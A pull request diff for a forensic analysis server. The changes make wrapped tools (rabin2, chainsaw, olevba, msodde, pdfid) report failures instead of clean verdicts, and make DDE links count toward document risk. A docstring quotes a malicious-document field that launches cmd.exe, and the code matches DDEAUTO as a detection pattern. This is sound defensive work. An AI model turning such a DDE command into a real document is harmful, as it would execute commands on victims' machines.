### PR TITLE
[high] fix(binary): index the triage analysis, not only the rabin2 dump

### DIFF
--- a/src/mulder/server/helpers.py
+++ b/src/mulder/server/helpers.py
@@ -107,6 +107,50 @@ def run_subprocess(
         return f"Failed to run {cmd[0]}: {exc}"
 
 
+_EXIT_PREVIEW_CHARS = 500
+
+
+def classify_tool_exit(
+    proc: subprocess.CompletedProcess[str],
+    binary: str,
+    *,
+    produced_output: bool,
+) -> tuple[str, str]:
+    """Decide what a finished CLI tool's exit status means for the caller.
+
+    Returns ``(verdict, message)`` where *verdict* is one of:
+
+    ``"ok"``
+        The tool exited 0. Nothing to report.
+    ``"partial"``
+        The tool exited non-zero but still produced output. Several of the
+        wrapped tools exit non-zero on a single unreadable input file while
+        having processed every other one (chainsaw does this without
+        ``--skip-errors``), so the results are kept and the message is
+        surfaced as a warning.
+    ``"failed"``
+        The tool exited non-zero and produced nothing. Reporting this as a
+        successful scan with zero findings is the single worst thing a DFIR
+        tool can do, so callers must turn it into an error.
+
+    A tool that exits 0 without producing output is *not* classified here:
+    "no output" is a legitimate clean result for most of these tools, and
+    the ones where it is not (hayabusa refuses to overwrite and still exits
+    0) check for their own output file explicitly.
+    """
+    if proc.returncode == 0:
+        return "ok", ""
+
+    detail = ((proc.stderr or "").strip() or (proc.stdout or "").strip())[:_EXIT_PREVIEW_CHARS]
+    if produced_output:
+        return (
+            "partial",
+            f"{binary} exited {proc.returncode} but produced output; "
+            f"results may be incomplete: {detail}",
+        )
+    return "failed", f"{binary} exited {proc.returncode} and produced no output: {detail}"
+
+
 def make_tool_call_id() -> str:
     """Generate a short unique identifier for a tool invocation."""
     return f"tc_{uuid4().hex[:8]}"
@@ -585,6 +629,21 @@ def run_cli_tool(
         return error_response(tc_id, tool_name, params, result, error_type="timeout")
     proc = result
 
-    summary = extract_and_index(proc.stdout.strip(), source_name, source_path, extractor_label)
+    stdout = proc.stdout.strip()
+    verdict, message = classify_tool_exit(proc, binary, produced_output=bool(stdout))
+    if verdict == "failed":
+        return error_response(
+            tc_id,
+            tool_name,
+            params,
+            message,
+            elapsed_ms=(time.monotonic() - t0) * 1000,
+            error_type="tool_failed",
+        )
+
+    summary = extract_and_index(stdout, source_name, source_path, extractor_label)
     elapsed = (time.monotonic() - t0) * 1000
-    return tool_response(tc_id, tool_name, params, summary, source_name, elapsed)
+    response = tool_response(tc_id, tool_name, params, summary, source_name, elapsed)
+    if verdict == "partial":
+        response["warning"] = message
+    return response

--- a/src/mulder/server/helpers.py
+++ b/src/mulder/server/helpers.py
@@ -408,6 +408,15 @@ def tool_response(
         resp["line_count"] = line_count
     if windows_indexed is not None:
         resp["windows_indexed"] = windows_indexed
+    # A degraded run has to survive the compaction. Everything else in
+    # *results* is recoverable with search() or get_raw_output(), but an agent
+    # that never learns the analysis was incomplete will not go looking: it
+    # reads the preview, sees no findings, and concludes the evidence is clean.
+    if isinstance(results, dict):
+        for key in ("warning", "partial"):
+            value = results.get(key)
+            if value:
+                resp[key] = value
     return resp
 
 

--- a/src/mulder/server/tools/binary.py
+++ b/src/mulder/server/tools/binary.py
@@ -877,7 +877,7 @@ def run_capa(
             error_type="file_not_found",
         )
 
-    cmd = [capa_bin, "--format", "json", "--quiet"]
+    cmd = [capa_bin, "--json", "--quiet"]
     if rules_path:
         if not Path(rules_path).exists():
             return error_response(
@@ -1018,13 +1018,12 @@ def run_floss(
 
     cmd = [
         floss_bin,
-        "--format",
-        "json",
+        "--json",
         "--minimum-length",
         str(minimum_length),
     ]
     if not include_static:
-        cmd.append("--only")
+        cmd.extend(["--no", "static"])
     cmd.append(str(target))
 
     floss_timeout = adaptive_timeout(file_path, base=_FLOSS_TIMEOUT)

--- a/src/mulder/server/tools/binary.py
+++ b/src/mulder/server/tools/binary.py
@@ -1021,10 +1021,13 @@ def run_floss(
         "--json",
         "--minimum-length",
         str(minimum_length),
+        # The sample must precede --no/--only: both are nargs="+" with
+        # `choices`, so argparse consumes the following path as a string
+        # type and exits 2.
+        str(target),
     ]
     if not include_static:
         cmd.extend(["--no", "static"])
-    cmd.append(str(target))
 
     floss_timeout = adaptive_timeout(file_path, base=_FLOSS_TIMEOUT)
     try:

--- a/src/mulder/server/tools/binary.py
+++ b/src/mulder/server/tools/binary.py
@@ -15,6 +15,7 @@ from mulder.server.app import mcp
 from mulder.server.extract_helpers import extract_and_index
 from mulder.server.helpers import (
     adaptive_timeout,
+    classify_tool_exit,
     error_response,
     make_tool_call_id,
     require_binary,
@@ -135,6 +136,11 @@ def _run_rabin2(flags: str, file_path: Path) -> dict[str, Any]:
         timeout=_RABIN2_TIMEOUT,
         check=False,
     )
+    verdict, message = classify_tool_exit(
+        proc, "rabin2", produced_output=bool(proc.stdout.strip())
+    )
+    if verdict == "failed":
+        raise OSError(message)
     if not proc.stdout.strip():
         return {}
     try:
@@ -403,6 +409,7 @@ def _compute_verdict(
     suspicious_imports: dict[str, list[str]],
     timestamp: dict[str, object],
     sections: list[dict[str, object]],
+    incomplete: list[str] | None = None,
 ) -> dict[str, object]:
     """Compute an overall triage verdict from analysis results.
 
@@ -415,6 +422,8 @@ def _compute_verdict(
         suspicious_imports: Imports grouped by threat category.
         timestamp: Timestamp validity assessment dict.
         sections: Section metadata with entropy and permissions.
+        incomplete: Analyses that did not run. A score of zero derived from
+            evidence that was never collected is not a benign verdict.
 
     Returns:
         Dict with classification, confidence, and reasons.
@@ -460,6 +469,14 @@ def _compute_verdict(
     else:
         classification = "benign_indicators"
         confidence = "medium"
+
+    if incomplete:
+        # Nothing was found because nothing was looked at. Saying so is the
+        # difference between "this binary is clean" and "this binary was not
+        # examined", which the caller otherwise cannot tell apart.
+        classification = "inconclusive"
+        confidence = "none"
+        reasons.append("Analysis incomplete: " + "; ".join(incomplete))
 
     return {
         "classification": classification,
@@ -747,6 +764,8 @@ def triage_binary(
     strings_of_interest: list[dict[str, object]] = []
     hashes: dict[str, str] = {}
 
+    incomplete: list[str] = []
+
     if depth in ("standard", "deep"):
         try:
             imports_raw = _run_rabin2("i", target)
@@ -761,16 +780,22 @@ def triage_binary(
             strings_of_interest = _parse_strings(strings_raw)
             raw_parts.append(json.dumps(strings_raw, indent=2, default=str))
         except subprocess.TimeoutExpired:
+            # Imports and sections are the evidence the verdict is computed
+            # from. Losing them and then scoring zero is how a sample that was
+            # never analysed comes back as "benign_indicators".
+            incomplete.append(f"rabin2 timed out after {_RABIN2_TIMEOUT}s")
             logger.warning("rabin2 timed out during standard analysis of %s", file_path)
-        except OSError:
-            logger.warning("Failed to run rabin2 standard analysis on %s", file_path)
+        except OSError as exc:
+            incomplete.append(f"rabin2 failed: {exc}")
+            logger.warning("Failed to run rabin2 standard analysis on %s: %s", file_path, exc)
 
     if depth == "deep":
         try:
             libs_raw = _run_rabin2("l", target)
             raw_parts.append(json.dumps(libs_raw, indent=2, default=str))
-        except (subprocess.TimeoutExpired, OSError):
-            logger.warning("rabin2 library enumeration failed for %s", file_path)
+        except (subprocess.TimeoutExpired, OSError) as exc:
+            incomplete.append(f"rabin2 library enumeration failed: {exc}")
+            logger.warning("rabin2 library enumeration failed for %s: %s", file_path, exc)
 
         if require_binary("rahash2"):
             try:
@@ -786,8 +811,9 @@ def triage_binary(
                     if m:
                         hashes[m.group(1)] = m.group(2)
                 raw_parts.append(proc.stdout)
-            except (subprocess.TimeoutExpired, OSError):
-                logger.warning("rahash2 failed for %s", file_path)
+            except (subprocess.TimeoutExpired, OSError) as exc:
+                incomplete.append(f"rahash2 failed: {exc}")
+                logger.warning("rahash2 failed for %s: %s", file_path, exc)
 
     suspicious_imports = _classify_imports(imports)
     packing_indicators = _detect_packing(sections, imports)
@@ -799,7 +825,9 @@ def triage_binary(
         raw_ts = None
     timestamp = _assess_timestamp(raw_ts)
 
-    verdict = _compute_verdict(packing_indicators, suspicious_imports, timestamp, sections)
+    verdict = _compute_verdict(
+        packing_indicators, suspicious_imports, timestamp, sections, incomplete
+    )
 
     combined_output = "\n\n".join(raw_parts)
     summary = extract_and_index(combined_output, "binary.triage", file_path, "rabin2")
@@ -813,6 +841,12 @@ def triage_binary(
     summary["hashes"] = hashes
     summary["triage_verdict"] = verdict
     summary["depth"] = depth
+    summary["analysis_complete"] = not incomplete
+    if incomplete:
+        summary["warning"] = (
+            "Triage is incomplete, so the verdict is not evidence of a clean binary: "
+            + "; ".join(incomplete)
+        )
 
     elapsed = (time.monotonic() - t0) * 1000
     return tool_response(tc_id, "triage_binary", params, summary, "binary.triage", elapsed)

--- a/src/mulder/server/tools/binary.py
+++ b/src/mulder/server/tools/binary.py
@@ -404,6 +404,62 @@ def _assess_timestamp(raw_ts: str | None) -> dict[str, object]:
     }
 
 
+def _triage_findings_text(
+    file_info: dict[str, object],
+    timestamp: dict[str, object],
+    packing_indicators: list[str],
+    suspicious_imports: dict[str, list[str]],
+    verdict: dict[str, object],
+) -> str:
+    """Render the derived triage analysis as searchable text.
+
+    Everything here is computed from the raw rabin2 output and then, before
+    this change, discarded: ``tool_response`` replaces the results dict with a
+    short preview, and only the raw JSON was indexed. An analyst searching the
+    case for ``UPX`` or ``VirtualAllocEx`` could not find the tool's own
+    conclusion about the binary.
+
+    Args:
+        file_info: Parsed ``rabin2 -I`` metadata.
+        timestamp: The compilation-timestamp assessment.
+        packing_indicators: Packing signals detected.
+        suspicious_imports: Suspicious APIs grouped by category.
+        verdict: The computed classification.
+
+    Returns:
+        A text block, one finding per line.
+    """
+    lines = [
+        "Triage verdict: "
+        f"{verdict.get('classification', 'unknown')} "
+        f"(confidence {verdict.get('confidence', 'unknown')})"
+    ]
+    reasons = verdict.get("reasons")
+    if isinstance(reasons, list):
+        lines.extend(f"Reason: {reason}" for reason in reasons)
+
+    lines.append(
+        f"Format: {file_info.get('arch', '?')} {file_info.get('bits', '?')}-bit "
+        f"{file_info.get('os', '?')}"
+    )
+    compiler = file_info.get("compiler")
+    if compiler:
+        lines.append(f"Compiler: {compiler}")
+
+    lines.append(
+        f"Compilation timestamp: {timestamp.get('parsed_utc') or 'none'} "
+        f"[{timestamp.get('validity', 'unknown')}]"
+    )
+
+    for indicator in packing_indicators:
+        lines.append(f"Packing indicator: {indicator}")
+
+    for category, apis in suspicious_imports.items():
+        lines.append(f"Suspicious imports ({category}): {', '.join(str(a) for a in apis)}")
+
+    return "\n".join(lines)
+
+
 def _compute_verdict(
     packing_indicators: list[str],
     suspicious_imports: dict[str, list[str]],
@@ -829,7 +885,20 @@ def triage_binary(
         packing_indicators, suspicious_imports, timestamp, sections, incomplete
     )
 
-    combined_output = "\n\n".join(raw_parts)
+    # The derived analysis has to be indexed, not just the raw rabin2 JSON.
+    # tool_response returns a 500-character preview once a source is given, so
+    # the verdict, the packing indicators and the suspicious imports never
+    # reach the caller in the response; and if they are not in the indexed
+    # text either, search(source="binary.triage") cannot recover them. The
+    # analysis would exist only inside this function.
+    combined_output = "\n\n".join(
+        [
+            _triage_findings_text(
+                file_info, timestamp, packing_indicators, suspicious_imports, verdict
+            )
+        ]
+        + raw_parts
+    )
     summary = extract_and_index(combined_output, "binary.triage", file_path, "rabin2")
 
     summary["file_info"] = file_info

--- a/src/mulder/server/tools/chainsaw.py
+++ b/src/mulder/server/tools/chainsaw.py
@@ -57,6 +57,16 @@ def _default_sigma_rules() -> Path:
     return asset_display_path("sigma-rules", "rules", "windows")
 
 
+def _default_chainsaw_mapping() -> Path:
+    """The Sigma-to-EVTX field mapping chainsaw requires for ``hunt -s``.
+
+    ``chainsaw hunt`` treats ``--mapping`` as *required* whenever Sigma rules
+    are supplied; the file ships in chainsaw's own ``mappings/`` directory,
+    which ``mulder setup`` fetches alongside the binary.
+    """
+    return asset_display_path("chainsaw", "mappings", "sigma-event-logs-all.yml")
+
+
 def _resolve_evtx_evidence(evidence_path: str) -> str:
     """Resolve a disk image path to its EVTX extraction directory.
 
@@ -108,6 +118,7 @@ def _run_chainsaw_hunt(
     binary: str,
     evidence_path: Path,
     sigma_rules_path: Path,
+    mapping_path: Path,
     output_dir: Path,
     time_start: str | None = None,
     time_end: str | None = None,
@@ -119,6 +130,7 @@ def _run_chainsaw_hunt(
         binary: Resolved Chainsaw executable.
         evidence_path: Directory containing .evtx files.
         sigma_rules_path: Path to Sigma rules directory.
+        mapping_path: Path to the chainsaw Sigma field-mapping file.
         output_dir: Output directory for results.
         time_start: Optional time range start (ISO 8601).
         time_end: Optional time range end (ISO 8601).
@@ -137,6 +149,8 @@ def _run_chainsaw_hunt(
         str(evidence_path),
         "-s",
         str(sigma_rules_path),
+        "--mapping",
+        str(mapping_path),
         "--json",
         "--output",
         str(output_file),
@@ -208,13 +222,18 @@ def _run_chainsaw_search(
 
 
 def _run_chainsaw_srum(
-    binary: str, srum_path: Path, output_dir: Path, timeout: int = _CHAINSAW_TIMEOUT
+    binary: str,
+    srum_path: Path,
+    software_hive: Path,
+    output_dir: Path,
+    timeout: int = _CHAINSAW_TIMEOUT,
 ) -> Path:
     """Execute Chainsaw SRUM parsing mode.
 
     Args:
         binary: Resolved Chainsaw executable.
         srum_path: Path to the SRUDB.dat file.
+        software_hive: Path to the SOFTWARE registry hive (required by chainsaw).
         output_dir: Output directory for results.
         timeout: Subprocess timeout in seconds.
 
@@ -230,7 +249,8 @@ def _run_chainsaw_srum(
         "analyse",
         "srum",
         str(srum_path),
-        "--json",
+        "--software",
+        str(software_hive),
         "--output",
         str(output_file),
     ]
@@ -248,8 +268,6 @@ def _run_chainsaw_timeline(
     binary: str,
     evidence_path: Path,
     output_dir: Path,
-    time_start: str | None = None,
-    time_end: str | None = None,
     timeout: int = _CHAINSAW_TIMEOUT,
 ) -> Path:
     """Execute Chainsaw in dump/timeline mode against EVTX files.
@@ -258,8 +276,6 @@ def _run_chainsaw_timeline(
         binary: Resolved Chainsaw executable.
         evidence_path: Directory containing .evtx files.
         output_dir: Output directory for results.
-        time_start: Optional time range start.
-        time_end: Optional time range end.
         timeout: Subprocess timeout in seconds.
 
     Returns:
@@ -277,10 +293,6 @@ def _run_chainsaw_timeline(
         "--output",
         str(output_file),
     ]
-    if time_start:
-        cmd.extend(["--from", time_start])
-    if time_end:
-        cmd.extend(["--to", time_end])
 
     subprocess.run(
         cmd,
@@ -420,6 +432,7 @@ def run_chainsaw(
     mode: Literal["hunt", "search", "srum", "timeline"] = "hunt",
     sigma_rules_path: str = "",
     search_term: str | None = None,
+    software_hive: str = "",
     time_range_start: str | None = None,
     time_range_end: str | None = None,
     force: bool = False,
@@ -442,10 +455,13 @@ def run_chainsaw(
             resolves to the rules installed by 'mulder setup'.
         search_term: Required when mode="search". The keyword or
             regex pattern to search for in EVTX records.
+        software_hive: Required when mode="srum". Path to the SOFTWARE
+            registry hive extracted from the same host as the SRUM
+            database; chainsaw needs it to resolve application IDs.
         time_range_start: Optional ISO 8601 timestamp to filter results
-            (inclusive start).
+            (inclusive start). Not supported in "timeline" mode.
         time_range_end: Optional ISO 8601 timestamp to filter results
-            (inclusive end).
+            (inclusive end). Not supported in "timeline" mode.
         force: Re-run extraction even if sources already exist.
     """
     tc_id = make_tool_call_id()
@@ -455,6 +471,7 @@ def run_chainsaw(
         "mode": mode,
         "sigma_rules_path": sigma_rules_path,
         "search_term": search_term,
+        "software_hive": software_hive,
         "time_range_start": time_range_start,
         "time_range_end": time_range_end,
         "force": force,
@@ -511,7 +528,37 @@ def run_chainsaw(
             error_type="invalid_argument",
         )
 
+    if mode == "srum" and not software_hive:
+        return error_response(
+            tc_id,
+            "run_chainsaw",
+            params,
+            "software_hive is required when mode='srum': chainsaw needs the "
+            "SOFTWARE registry hive to resolve SRUM application IDs",
+            error_type="invalid_argument",
+        )
+
+    if mode == "timeline" and (time_range_start or time_range_end):
+        return error_response(
+            tc_id,
+            "run_chainsaw",
+            params,
+            "chainsaw dump has no time-range filter; use mode='search' or "
+            "filter the returned timeline instead",
+            error_type="invalid_argument",
+        )
+
     rules = Path(sigma_rules_path) if sigma_rules_path else _default_sigma_rules()
+    mapping = _default_chainsaw_mapping()
+    if mode == "hunt" and not mapping.exists():
+        return error_response(
+            tc_id,
+            "run_chainsaw",
+            params,
+            f"chainsaw Sigma mapping not found at {mapping}. Run 'mulder setup' "
+            "to provision chainsaw's mappings/ directory.",
+            error_type="asset_missing",
+        )
 
     timeout = adaptive_timeout(evidence_path, base=_CHAINSAW_TIMEOUT)
     with tempfile.TemporaryDirectory(prefix="mulder_chainsaw_") as tmpdir:
@@ -522,6 +569,7 @@ def run_chainsaw(
                     binary,
                     Path(evidence_path),
                     rules,
+                    mapping,
                     output_dir,
                     time_range_start,
                     time_range_end,
@@ -544,7 +592,11 @@ def run_chainsaw(
                 source_name = "chainsaw.search"
             elif mode == "srum":
                 results_path = _run_chainsaw_srum(
-                    binary, Path(evidence_path), output_dir, timeout=timeout
+                    binary,
+                    Path(evidence_path),
+                    Path(software_hive),
+                    output_dir,
+                    timeout=timeout,
                 )
                 result = _parse_chainsaw_srum_results(results_path)
                 source_name = "chainsaw.srum"
@@ -553,8 +605,6 @@ def run_chainsaw(
                     binary,
                     Path(evidence_path),
                     output_dir,
-                    time_range_start,
-                    time_range_end,
                     timeout=timeout,
                 )
                 result = _parse_chainsaw_timeline_results(results_path)

--- a/src/mulder/server/tools/chainsaw.py
+++ b/src/mulder/server/tools/chainsaw.py
@@ -17,6 +17,7 @@ from mulder.server.app import get_ctx, mcp
 from mulder.server.extract_helpers import extract_and_index
 from mulder.server.helpers import (
     adaptive_timeout,
+    classify_tool_exit,
     error_response,
     make_tool_call_id,
     require_binary,
@@ -123,7 +124,7 @@ def _run_chainsaw_hunt(
     time_start: str | None = None,
     time_end: str | None = None,
     timeout: int = _CHAINSAW_TIMEOUT,
-) -> Path:
+) -> tuple[Path, subprocess.CompletedProcess[str]]:
     """Execute Chainsaw in hunt mode against EVTX files.
 
     Args:
@@ -137,7 +138,10 @@ def _run_chainsaw_hunt(
         timeout: Subprocess timeout in seconds.
 
     Returns:
-        Path to the JSON results file.
+        ``(results_path, completed_process)``. The caller must inspect the
+        process: chainsaw exits non-zero on an unusable argument or rule set
+        and writes nothing, which is otherwise indistinguishable from a run
+        that legitimately found no detections.
 
     Raises:
         subprocess.TimeoutExpired: If Chainsaw exceeds the timeout.
@@ -160,14 +164,14 @@ def _run_chainsaw_hunt(
     if time_end:
         cmd.extend(["--to", time_end])
 
-    subprocess.run(
+    proc = subprocess.run(
         cmd,
         capture_output=True,
         text=True,
         timeout=timeout,
         check=False,
     )
-    return output_file
+    return output_file, proc
 
 
 def _run_chainsaw_search(
@@ -178,7 +182,7 @@ def _run_chainsaw_search(
     time_start: str | None = None,
     time_end: str | None = None,
     timeout: int = _CHAINSAW_TIMEOUT,
-) -> Path:
+) -> tuple[Path, subprocess.CompletedProcess[str]]:
     """Execute Chainsaw in search mode against EVTX files.
 
     Args:
@@ -191,7 +195,10 @@ def _run_chainsaw_search(
         timeout: Subprocess timeout in seconds.
 
     Returns:
-        Path to the JSON results file.
+        ``(results_path, completed_process)``. The caller must inspect the
+        process: chainsaw exits non-zero on an unusable argument or rule set
+        and writes nothing, which is otherwise indistinguishable from a run
+        that legitimately found no detections.
 
     Raises:
         subprocess.TimeoutExpired: If Chainsaw exceeds the timeout.
@@ -211,14 +218,14 @@ def _run_chainsaw_search(
     if time_end:
         cmd.extend(["--to", time_end])
 
-    subprocess.run(
+    proc = subprocess.run(
         cmd,
         capture_output=True,
         text=True,
         timeout=timeout,
         check=False,
     )
-    return output_file
+    return output_file, proc
 
 
 def _run_chainsaw_srum(
@@ -227,7 +234,7 @@ def _run_chainsaw_srum(
     software_hive: Path,
     output_dir: Path,
     timeout: int = _CHAINSAW_TIMEOUT,
-) -> Path:
+) -> tuple[Path, subprocess.CompletedProcess[str]]:
     """Execute Chainsaw SRUM parsing mode.
 
     Args:
@@ -238,7 +245,10 @@ def _run_chainsaw_srum(
         timeout: Subprocess timeout in seconds.
 
     Returns:
-        Path to the JSON results file.
+        ``(results_path, completed_process)``. The caller must inspect the
+        process: chainsaw exits non-zero on an unusable argument or rule set
+        and writes nothing, which is otherwise indistinguishable from a run
+        that legitimately found no detections.
 
     Raises:
         subprocess.TimeoutExpired: If Chainsaw exceeds the timeout.
@@ -254,14 +264,14 @@ def _run_chainsaw_srum(
         "--output",
         str(output_file),
     ]
-    subprocess.run(
+    proc = subprocess.run(
         cmd,
         capture_output=True,
         text=True,
         timeout=timeout,
         check=False,
     )
-    return output_file
+    return output_file, proc
 
 
 def _run_chainsaw_timeline(
@@ -269,7 +279,7 @@ def _run_chainsaw_timeline(
     evidence_path: Path,
     output_dir: Path,
     timeout: int = _CHAINSAW_TIMEOUT,
-) -> Path:
+) -> tuple[Path, subprocess.CompletedProcess[str]]:
     """Execute Chainsaw in dump/timeline mode against EVTX files.
 
     Args:
@@ -279,7 +289,10 @@ def _run_chainsaw_timeline(
         timeout: Subprocess timeout in seconds.
 
     Returns:
-        Path to the JSON results file.
+        ``(results_path, completed_process)``. The caller must inspect the
+        process: chainsaw exits non-zero on an unusable argument or rule set
+        and writes nothing, which is otherwise indistinguishable from a run
+        that legitimately found no detections.
 
     Raises:
         subprocess.TimeoutExpired: If Chainsaw exceeds the timeout.
@@ -294,14 +307,14 @@ def _run_chainsaw_timeline(
         str(output_file),
     ]
 
-    subprocess.run(
+    proc = subprocess.run(
         cmd,
         capture_output=True,
         text=True,
         timeout=timeout,
         check=False,
     )
-    return output_file
+    return output_file, proc
 
 
 def _parse_chainsaw_hunt_results(results_path: Path) -> dict[str, Any]:
@@ -565,7 +578,7 @@ def run_chainsaw(
         output_dir = Path(tmpdir)
         try:
             if mode == "hunt":
-                results_path = _run_chainsaw_hunt(
+                results_path, proc = _run_chainsaw_hunt(
                     binary,
                     Path(evidence_path),
                     rules,
@@ -579,7 +592,7 @@ def run_chainsaw(
                 source_name = "chainsaw.hunt"
             elif mode == "search":
                 assert search_term is not None
-                results_path = _run_chainsaw_search(
+                results_path, proc = _run_chainsaw_search(
                     binary,
                     Path(evidence_path),
                     search_term,
@@ -591,7 +604,7 @@ def run_chainsaw(
                 result = _parse_chainsaw_hunt_results(results_path)
                 source_name = "chainsaw.search"
             elif mode == "srum":
-                results_path = _run_chainsaw_srum(
+                results_path, proc = _run_chainsaw_srum(
                     binary,
                     Path(evidence_path),
                     Path(software_hive),
@@ -601,7 +614,7 @@ def run_chainsaw(
                 result = _parse_chainsaw_srum_results(results_path)
                 source_name = "chainsaw.srum"
             else:
-                results_path = _run_chainsaw_timeline(
+                results_path, proc = _run_chainsaw_timeline(
                     binary,
                     Path(evidence_path),
                     output_dir,
@@ -629,6 +642,19 @@ def run_chainsaw(
                 error_type="os_error",
             )
 
+        verdict, message = classify_tool_exit(
+            proc, "chainsaw", produced_output=results_path.exists()
+        )
+        if verdict == "failed":
+            return error_response(
+                tc_id,
+                "run_chainsaw",
+                params,
+                message,
+                (time.monotonic() - t0) * 1000,
+                error_type="tool_failed",
+            )
+
         text_parts = [f"Chainsaw {mode} analysis of {evidence_path}"]
         if mode in ("hunt", "search"):
             text_parts.append(f"Total findings: {result.get('total_findings', 0)}")
@@ -643,4 +669,7 @@ def run_chainsaw(
         summary.update(result)
 
     elapsed = (time.monotonic() - t0) * 1000
-    return tool_response(tc_id, "run_chainsaw", params, summary, source_name, elapsed)
+    response = tool_response(tc_id, "run_chainsaw", params, summary, source_name, elapsed)
+    if verdict == "partial":
+        response["warning"] = message
+    return response

--- a/src/mulder/server/tools/documents.py
+++ b/src/mulder/server/tools/documents.py
@@ -16,6 +16,7 @@ from mulder.assets.paths import asset_path, asset_search_summary
 from mulder.server.app import mcp
 from mulder.server.extract_helpers import extract_and_index
 from mulder.server.helpers import (
+    classify_tool_exit,
     error_response,
     make_tool_call_id,
     require_binary,
@@ -208,6 +209,34 @@ def _parse_msodde_output(stdout: str) -> list[dict[str, object]]:
     ]
 
 
+def _olevba_failure(raw: Any) -> str:
+    """Return olevba's own error message, or ``""`` when it analysed the file.
+
+    olevba's JSON is a list of typed entries, and a run that could not read the
+    document still exits with a valid document::
+
+        {"file": "x.doc", "type": "error", "error": "PathNotFoundException",
+         "message": "Given path does not exist: 'x.doc'"}
+
+    The entry carries no ``macros`` and no ``analysis``, so a parser that only
+    looks for those sees an empty result and the document is scored ``clean``.
+    Verified against oletools 0.60.2.
+    """
+    entries: list[Any]
+    if isinstance(raw, dict):
+        entries = [raw, *raw.get("results", [])]
+    elif isinstance(raw, list):
+        entries = list(raw)
+    else:
+        return ""
+
+    for entry in entries:
+        if not isinstance(entry, dict) or entry.get("type") != "error":
+            continue
+        return str(entry.get("message") or entry.get("error") or "olevba reported an error")[:500]
+    return ""
+
+
 def _analyze_macros_olevba(
     file_path: Path,
 ) -> tuple[list[dict[str, object]], list[dict[str, object]], bool]:
@@ -239,6 +268,10 @@ def _analyze_macros_olevba(
     # Module invocation always execs successfully, so a broken oletools would
     # otherwise be indistinguishable from "this document has no macros" — the
     # worst possible false negative for a potentially malicious document.
+    #
+    # The exit code alone cannot carry this decision: olevba's RETURN_WARNINGS
+    # is 1, so a non-zero status is how a *successful* analysis reports that it
+    # found something. Failures are recognised from the output instead.
     if proc.returncode != 0 and not output:
         raise OSError(
             f"olevba failed (exit {proc.returncode}): {proc.stderr.strip()[:500] or 'no output'}"
@@ -248,9 +281,13 @@ def _analyze_macros_olevba(
 
     try:
         raw: Any = json.loads(output)
-    except json.JSONDecodeError:
-        logger.warning("Failed to parse olevba JSON output for %s", file_path)
-        return [], [], False
+    except json.JSONDecodeError as exc:
+        # Unparseable output is a broken run, not a clean document.
+        raise OSError(f"olevba emitted unparseable JSON (exit {proc.returncode}): {exc}") from exc
+
+    failure = _olevba_failure(raw)
+    if failure:
+        raise OSError(f"olevba failed to analyse the document: {failure}")
 
     macros: list[dict[str, object]] = []
     indicators: list[dict[str, object]] = []
@@ -298,18 +335,27 @@ def _analyze_macros_olevba(
 def _assess_office_risk(
     macros: list[dict[str, object]],
     has_vba: bool,
+    dde_links: list[dict[str, object]] | None = None,
 ) -> dict[str, object]:
     """Assess risk level for an Office document.
+
+    A DDE document carries no VBA at all -- that is the point of the
+    technique -- so a verdict computed from macros alone short-circuits to
+    ``clean`` for a ``DDEAUTO c:\\windows\\system32\\cmd.exe`` maldoc, which
+    is the whole reason ``analyze_dde`` exists.
 
     Args:
         macros: Extracted macro information.
         has_vba: Whether VBA macros were detected.
+        dde_links: DDE links found by msodde, if the analysis ran.
 
     Returns:
         Dict with risk_level, auto_exec, suspicious flags, and reasons.
     """
     reasons: list[str] = []
+    links = list(dde_links or [])
     auto_exec = any(m.get("is_auto_exec") for m in macros)
+    dde_auto = any("DDEAUTO" in str(link.get("field_type", "")).upper() for link in links)
 
     has_suspicious = any(m.get("suspicious_keywords") for m in macros)
 
@@ -338,8 +384,17 @@ def _assess_office_risk(
         reasons.append("Downloads content from external sources")
     if has_obfuscation:
         reasons.append("Character obfuscation detected")
+    if links:
+        reasons.append(
+            f"{len(links)} DDE link(s) present"
+            + (" including an auto-executing one" if dde_auto else "")
+        )
 
-    if not has_vba:
+    if links:
+        # A DDE link executes a command when the document is opened (DDEAUTO)
+        # or when the user accepts one prompt. Either way this is not clean.
+        risk_level = "malicious" if dde_auto else "high"
+    elif not has_vba:
         risk_level = "clean"
     elif auto_exec and (has_execute or has_download):
         risk_level = "malicious"
@@ -359,6 +414,7 @@ def _assess_office_risk(
         "write_to_filesystem": has_execute,
         "external_connections": has_download,
         "obfuscation_detected": has_obfuscation,
+        "dde_links_present": bool(links),
         "reasons": reasons,
     }
 
@@ -395,6 +451,13 @@ def _run_pdfid(file_path: Path) -> list[dict[str, object]]:
         timeout=_PDFID_TIMEOUT,
         check=False,
     )
+
+    # A pdfid that crashed prints a traceback and no keyword lines, which is
+    # indistinguishable from a PDF with no risky keywords -- and the caller
+    # scores the second as clean.
+    verdict, message = classify_tool_exit(proc, "pdfid", produced_output=bool(proc.stdout.strip()))
+    if verdict == "failed":
+        raise OSError(message)
 
     indicators: list[dict[str, object]] = []
     for line in proc.stdout.splitlines():
@@ -675,10 +738,10 @@ def analyze_office_document(
             (time.monotonic() - t0) * 1000,
         )
 
-    risk = _assess_office_risk(macros, has_vba)
-
-    # DDE analysis via msodde if requested and available
+    # DDE analysis via msodde if requested and available. It runs before the
+    # risk assessment because its result is an input to that assessment.
     dde_links: list[dict[str, object]] = []
+    dde_warning = ""
     if analyze_dde:
         try:
             proc = subprocess.run(
@@ -692,16 +755,17 @@ def analyze_office_document(
             # silently as "no DDE links found". msodde always prints its banner
             # to stdout, so a stdout-emptiness test here would never fire.
             if proc.returncode != 0:
-                logger.warning(
-                    "msodde failed for %s (exit %s): %s",
-                    file_path,
-                    proc.returncode,
-                    proc.stderr.strip()[:500] or proc.stdout.strip()[:500] or "no output",
+                dde_warning = f"msodde exited {proc.returncode}; DDE analysis did not run: " + (
+                    proc.stderr.strip()[:500] or proc.stdout.strip()[:500] or "no output"
                 )
+                logger.warning("msodde failed for %s: %s", file_path, dde_warning)
             else:
                 dde_links = _parse_msodde_output(proc.stdout)
-        except (subprocess.TimeoutExpired, OSError):
-            logger.debug("msodde analysis failed for %s", file_path)
+        except (subprocess.TimeoutExpired, OSError) as exc:
+            dde_warning = f"DDE analysis did not run: {type(exc).__name__}"
+            logger.debug("msodde analysis failed for %s: %s", file_path, exc)
+
+    risk = _assess_office_risk(macros, has_vba, dde_links)
 
     index_parts: list[str] = [
         f"File: {file_path}",
@@ -712,6 +776,11 @@ def analyze_office_document(
         index_parts.append(f"Module: {m.get('module_name', 'unknown')}")
         if extract_macros:
             index_parts.append(str(m.get("source_code", "")))
+    # The DDE command is the payload of a DDE maldoc. Leaving it out of the
+    # indexed text means no case-wide search for cmd.exe or powershell can
+    # ever reach it.
